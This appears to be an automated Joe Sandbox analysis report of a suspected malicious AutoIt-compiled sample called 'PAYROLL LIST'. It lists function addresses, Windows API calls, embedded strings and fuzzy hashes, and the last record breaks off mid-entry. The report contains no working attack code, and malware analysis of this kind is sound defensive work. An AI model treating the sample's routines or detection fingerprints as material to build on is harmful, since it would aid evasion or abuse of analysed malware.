RegCloseKey.ADVAPI32(?), ref: 00A83B94
RegCloseKey.ADVAPI32(00000000), ref: 00A83BA1

Strings

REG_SZ, xrefs: 00A838B2
REG_BINARY, xrefs: 00A83B2F
REG_EXPAND_SZ, xrefs: 00A83811
REG_QWORD, xrefs: 00A83AE2
REG_DWORD, xrefs: 00A83A65
REG_MULTI_SZ, xrefs: 00A8395C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 1501ce3a9fffd732c2eaa86e32b99393573649401214008e99ed04c3c72d8c23
Instruction ID: 523c159d05ec414fe6362f20a83db8492131e2c887ca95fa4ff129ec6460210e
Opcode Fuzzy Hash: 1501ce3a9fffd732c2eaa86e32b99393573649401214008e99ed04c3c72d8c23
Instruction Fuzzy Hash: A8025A762046119FCB14EF18D955E2AB7E5FF89B20F04846DF99A9B3A1CB30ED01CB85

Function 00A86BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A86C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A86D16

Strings

SELECTINVERT, xrefs: 00A86DDE
GETTEXT, xrefs: 00A86CBF
GETITEMCOUNT, xrefs: 00A86C84
SELECT, xrefs: 00A86DA8
GETSELECTEDCOUNT, xrefs: 00A86CF9
VIEWCHANGE, xrefs: 00A86ECD
SELECTCLEAR, xrefs: 00A86D8D
SELECTALL, xrefs: 00A86D75
GETSELECTED, xrefs: 00A86E3C
GETSUBITEMCOUNT, xrefs: 00A86CA1
ISSELECTED, xrefs: 00A86D21
FINDITEM, xrefs: 00A86E81
DESELECT, xrefs: 00A86DFC

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: f2ef5328ae1defffd9c8511dd54690a4d583540362d4ecb4d217f47476386f34
Instruction ID: 7272fd44fcdbc91798cbbe4a0fa34c1cc1099eede4157d83e4adcff523e94b69
Opcode Fuzzy Hash: f2ef5328ae1defffd9c8511dd54690a4d583540362d4ecb4d217f47476386f34
Instruction Fuzzy Hash: 5EA15C302143519FDB14FF24DA51A6EB3A5BF84314F14496DB8A6AB3D2DB30ED0ACB91

Function 00A5CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A5CF91
__swprintf.LIBCMT ref: 00A5D032
_wcscmp.LIBCMT ref: 00A5D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A5D09A
_wcscmp.LIBCMT ref: 00A5D0D6
GetClassNameW.USER32(?,?,00000400), ref: 00A5D10D
GetDlgCtrlID.USER32(?), ref: 00A5D15F
GetWindowRect.USER32(?,?), ref: 00A5D195
GetParent.USER32(?), ref: 00A5D1B3
ScreenToClient.USER32(00000000), ref: 00A5D1BA
GetClassNameW.USER32(?,?,00000100), ref: 00A5D234
_wcscmp.LIBCMT ref: 00A5D248
GetWindowTextW.USER32(?,?,00000400), ref: 00A5D26E
_wcscmp.LIBCMT ref: 00A5D282

Strings

%s%u, xrefs: 00A5D02C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 126be741c9e2720b32e288508fe0a2b2bfdec202bca721adf585aa7a130686f1
Instruction ID: 90d0dcabd1a91136ce3e0ee02e08a5a65c358ed7a3e126fb31920499c18c1585
Opcode Fuzzy Hash: 126be741c9e2720b32e288508fe0a2b2bfdec202bca721adf585aa7a130686f1
Instruction Fuzzy Hash: 78A1C171604702AFD724DF64C984FEAB7A8FF44355F008629FD9AD2191DB30E94ACB91

Function 00A5D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00A5D8EB
_wcscmp.LIBCMT ref: 00A5D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00A5D924
CharUpperBuffW.USER32(?,00000000), ref: 00A5D941
_wcscmp.LIBCMT ref: 00A5D95F
_wcsstr.LIBCMT ref: 00A5D970
GetClassNameW.USER32(00000018,?,00000400), ref: 00A5D9A8
_wcscmp.LIBCMT ref: 00A5D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00A5D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 00A5DA28
_wcscmp.LIBCMT ref: 00A5DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 00A5DA60
GetWindowRect.USER32(00000004,?), ref: 00A5DAC9

Strings

ThumbnailClass, xrefs: 00A5D9B3, 00A5DA33
@, xrefs: 00A5D8C6

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f85edbe88fbf4159d179d2ed20eb3526d936e7ca4683016caf829f2b3383cbd6
Instruction ID: 66ea3bcf12474415dbd832042d1c9af4edaa7f30f4e33fa33704ac4093d29b38
Opcode Fuzzy Hash: f85edbe88fbf4159d179d2ed20eb3526d936e7ca4683016caf829f2b3383cbd6
Instruction Fuzzy Hash: 8C81E5710083059FDB25DF54C981FAA7BE8FF84355F04846AFD8A9A096DB30DD4ACBA1

Function 00A5D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A5D753

Strings

[ALL, xrefs: 00A5D7F9
ACTIVE, xrefs: 00A5D72E
CLASSNAME=, xrefs: 00A5D790
ALL, xrefs: 00A5D7E7
[ACTIVE, xrefs: 00A5D740
REGEXP=, xrefs: 00A5D768
HANDLE=, xrefs: 00A5D74C
[CLASS:, xrefs: 00A5D7A3
[HANDLE:, xrefs: 00A5D75F
LAST, xrefs: 00A5D718
[REGEXPTITLE:, xrefs: 00A5D77B
[LAST, xrefs: 00A5D800

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 8d41456339b452bf0f4adaf19f1d50a34e51f8abbeec4acca1155c3caec27601
Instruction ID: 38c4b107c22e8e364b798187a5a36c5b7e199bb86c760ad8ee8f8bc05083662a
Opcode Fuzzy Hash: 8d41456339b452bf0f4adaf19f1d50a34e51f8abbeec4acca1155c3caec27601
Instruction Fuzzy Hash: 6B318E35A44205BADB24EB64EE43FADB374BF20711F20053AF842721D1EBB1AE08C751

Function 00A5EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00A5EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A5EAC2
SetWindowTextW.USER32(?,?), ref: 00A5EAD9
GetDlgItem.USER32(?,000003EA), ref: 00A5EAEE
SetWindowTextW.USER32(00000000,?), ref: 00A5EAF4
GetDlgItem.USER32(?,000003E9), ref: 00A5EB04
SetWindowTextW.USER32(00000000,?), ref: 00A5EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A5EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A5EB45
GetWindowRect.USER32(?,?), ref: 00A5EB4E
SetWindowTextW.USER32(?,?), ref: 00A5EBB9
GetDesktopWindow.USER32 ref: 00A5EBBF
GetWindowRect.USER32(00000000), ref: 00A5EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A5EC12
GetClientRect.USER32(?,?), ref: 00A5EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A5EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A5EC6F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 77c0f9fd4b8c91b6fd96d9b41c2887b6f2c5f1cde1e06ad3845abb5ddb5765f4
Instruction ID: 2b8d0e57957496020152416e5ac36fd4862b237fa4ed7fd72224e57361ec8419
Opcode Fuzzy Hash: 77c0f9fd4b8c91b6fd96d9b41c2887b6f2c5f1cde1e06ad3845abb5ddb5765f4
Instruction Fuzzy Hash: 37513E7190070AAFDB24DFA8CD89F6EBBF5FF04706F014918E697A25A0D774A949CB10

Function 00A779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00A779C6
LoadCursorW.USER32(00000000,00007F00), ref: 00A779D1
LoadCursorW.USER32(00000000,00007F03), ref: 00A779DC
LoadCursorW.USER32(00000000,00007F8B), ref: 00A779E7
LoadCursorW.USER32(00000000,00007F01), ref: 00A779F2
LoadCursorW.USER32(00000000,00007F81), ref: 00A779FD
LoadCursorW.USER32(00000000,00007F88), ref: 00A77A08
LoadCursorW.USER32(00000000,00007F80), ref: 00A77A13
LoadCursorW.USER32(00000000,00007F86), ref: 00A77A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00A77A29
LoadCursorW.USER32(00000000,00007F85), ref: 00A77A34
LoadCursorW.USER32(00000000,00007F82), ref: 00A77A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00A77A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00A77A55
LoadCursorW.USER32(00000000,00007F02), ref: 00A77A60
LoadCursorW.USER32(00000000,00007F89), ref: 00A77A6B
GetCursorInfo.USER32(?), ref: 00A77A7B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: d8580d6a38ab1f9ac71c53345ec1dcdf207e96a97263b23d0e65d1685c620cb4
Instruction ID: 81df6cd98dcdcd2a2b531eb84869d75950ec72d0656a0508e357f3a32326f205
Opcode Fuzzy Hash: d8580d6a38ab1f9ac71c53345ec1dcdf207e96a97263b23d0e65d1685c620cb4
Instruction Fuzzy Hash: B53115B1D0831A6ADB109FB68C8995FBFE8FF04750F50453AA50DE7280DA78A5008FA1

Function 00A2C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 00A3E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A2C8B7,?,00002000,?,?,00000000,?,00A2419E,?,?,?,00ABDC00), ref: 00A3E984

Part of subcall function 00A2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A253B1,?,?,00A261FF,?,00000000,00000001,00000000), ref: 00A2662F

__wsplitpath.LIBCMT ref: 00A2C93E

Part of subcall function 00A41DFC: __wsplitpath_helper.LIBCMT ref: 00A41E3C

_wcscpy.LIBCMT ref: 00A2C953
_wcscat.LIBCMT ref: 00A2C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00A2C978
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2CABE

Part of subcall function 00A2B337: _wcscpy.LIBCMT ref: 00A2B36F

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00A9311B
Error opening the file, xrefs: 00A930B4, 00A9313D
Unterminated string, xrefs: 00A93470
EA06, xrefs: 00A930C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00A93098
AU3!, xrefs: 00A2C90C
Bad directive syntax error, xrefs: 00A93429

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 9b7055be470dd0dfab8baed08472f6d29f62578b6de43351e6ba8826cd157bbd
Instruction ID: 97ea0d8a661b0015b888113bdcbc66d6ee6bd2914b243242dbf369ce38011661
Opcode Fuzzy Hash: 9b7055be470dd0dfab8baed08472f6d29f62578b6de43351e6ba8826cd157bbd
Instruction Fuzzy Hash: BD1292715083419FCB24EF28D981AAFBBF5BF99314F00492EF58A97251DB30DA49CB52

Function 00A8CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8CEFB
DestroyWindow.USER32(?,?), ref: 00A8CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A8CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A8D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A8D025
DestroyWindow.USER32(?), ref: 00A8D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A20000,00000000), ref: 00A8D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A8D094
GetDesktopWindow.USER32 ref: 00A8D0A9
GetWindowRect.USER32(00000000), ref: 00A8D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A8D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A8D0DA

Part of subcall function 00A3B526: GetWindowLongW.USER32(?,000000EB), ref: 00A3B537

Strings

tooltips_class32, xrefs: 00A8CFED, 00A8D06E
0, xrefs: 00A8CF1B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: c20a3ffd29914a77de17149d5dd601cbf9d18c7258e18b69dfb13ec82465b035
Instruction ID: c14fe66a0d6e0c0ad70427fca61a8d49fe10bf67c3ed9a3ac8096ded6e6a97fb
Opcode Fuzzy Hash: c20a3ffd29914a77de17149d5dd601cbf9d18c7258e18b69dfb13ec82465b035
Instruction Fuzzy Hash: 7371CC70140345AFE724EF68DC85FA67BF5EB89704F44451DF9868B2A1D734E942CB22

Function 00A8F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

DragQueryPoint.SHELL32(?,?), ref: 00A8F37A

Part of subcall function 00A8D7DE: ClientToScreen.USER32(?,?), ref: 00A8D807
Part of subcall function 00A8D7DE: GetWindowRect.USER32(?,?), ref: 00A8D87D
Part of subcall function 00A8D7DE: PtInRect.USER32(?,?,00A8ED5A), ref: 00A8D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 00A8F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A8F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A8F411
_wcscat.LIBCMT ref: 00A8F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A8F458
SendMessageW.USER32(?,000000B0,?,?), ref: 00A8F471
SendMessageW.USER32(?,000000B1,?,?), ref: 00A8F488
SendMessageW.USER32(?,000000B1,?,?), ref: 00A8F4AA
DragFinish.SHELL32(?), ref: 00A8F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A8F59C

Strings

@GUI_DRAGFILE, xrefs: 00A8F54B
@GUI_DRAGID, xrefs: 00A8F510
@GUI_DROPID, xrefs: 00A8F4D1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 1e4f6f0a65056d9236c97531b204a1abc3aae92cca0c70a33b4436a718d746af
Instruction ID: 3b79136522689be3490aa618a82171aff7606e89f3ac94fc408445e5c60c67fb
Opcode Fuzzy Hash: 1e4f6f0a65056d9236c97531b204a1abc3aae92cca0c70a33b4436a718d746af
Instruction Fuzzy Hash: ED612971108301AFC711EF64DD85E9FBBE8FF89710F000A2EF596961A1DB709A09CB52

Function 00A6AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00A6AB3D
VariantCopy.OLEAUT32(?,?), ref: 00A6AB46
VariantClear.OLEAUT32(?), ref: 00A6AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A6AC40
__swprintf.LIBCMT ref: 00A6AC70
VarR8FromDec.OLEAUT32(?,?), ref: 00A6AC9C
VariantInit.OLEAUT32(?), ref: 00A6AD4D
SysFreeString.OLEAUT32(00000016), ref: 00A6ADDF
VariantClear.OLEAUT32(?), ref: 00A6AE35
VariantClear.OLEAUT32(?), ref: 00A6AE44
VariantInit.OLEAUT32(00000000), ref: 00A6AE80

Strings

Default, xrefs: 00A6ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 00A6AC6A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 74b34f5af6abb713368bd21dea9b69993b5f166639f18c8e932c7a041c02fb2c
Instruction ID: 766af8ef82cb5a91703ca435ccb6428d5f2e295484cd22380dd3fb3e4b1c30ed
Opcode Fuzzy Hash: 74b34f5af6abb713368bd21dea9b69993b5f166639f18c8e932c7a041c02fb2c
Instruction Fuzzy Hash: 90D1DE71A04215EBDB20AFA5D885B6EF7B9FF19700F148465F40AAB181DB74EC40DFA2

Function 00A8716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A871FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A87247

Strings

GETTEXT, xrefs: 00A87382
GETITEMCOUNT, xrefs: 00A87311
ISCHECKED, xrefs: 00A873B2
UNCHECK, xrefs: 00A8740B
SELECT, xrefs: 00A873E0
EXISTS, xrefs: 00A872B0
GETSELECTED, xrefs: 00A8733F
GETTOTALCOUNT, xrefs: 00A8722A
COLLAPSE, xrefs: 00A8728D
CHECK, xrefs: 00A87267
EXPAND, xrefs: 00A872E1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 1b64bda4cf90172075a04214ffd42bbe1a422587139a1f2a89094279d3115cbb
Instruction ID: 28c7ed6ef24ffcd98833350cd512e3782f7f09e9088f819ef9f31be5b548c4cd
Opcode Fuzzy Hash: 1b64bda4cf90172075a04214ffd42bbe1a422587139a1f2a89094279d3115cbb
Instruction Fuzzy Hash: AD914C342087119BCB04FF24D951A6EB7A1BF98350F10486DF8966B3A3DB30ED4ADB81

Function 00A8E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A8E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A8BEAF), ref: 00A8E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A8E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A8E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A8E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00A8BEAF), ref: 00A8E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A8E6DF
DestroyIcon.USER32(?,?,?,?,?,00A8BEAF), ref: 00A8E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A8E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A8E717

Part of subcall function 00A40FA7: __wcsicmp_l.LIBCMT ref: 00A41030

Strings

.icl, xrefs: 00A8E521
.exe, xrefs: 00A8E541
.dll, xrefs: 00A8E564

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
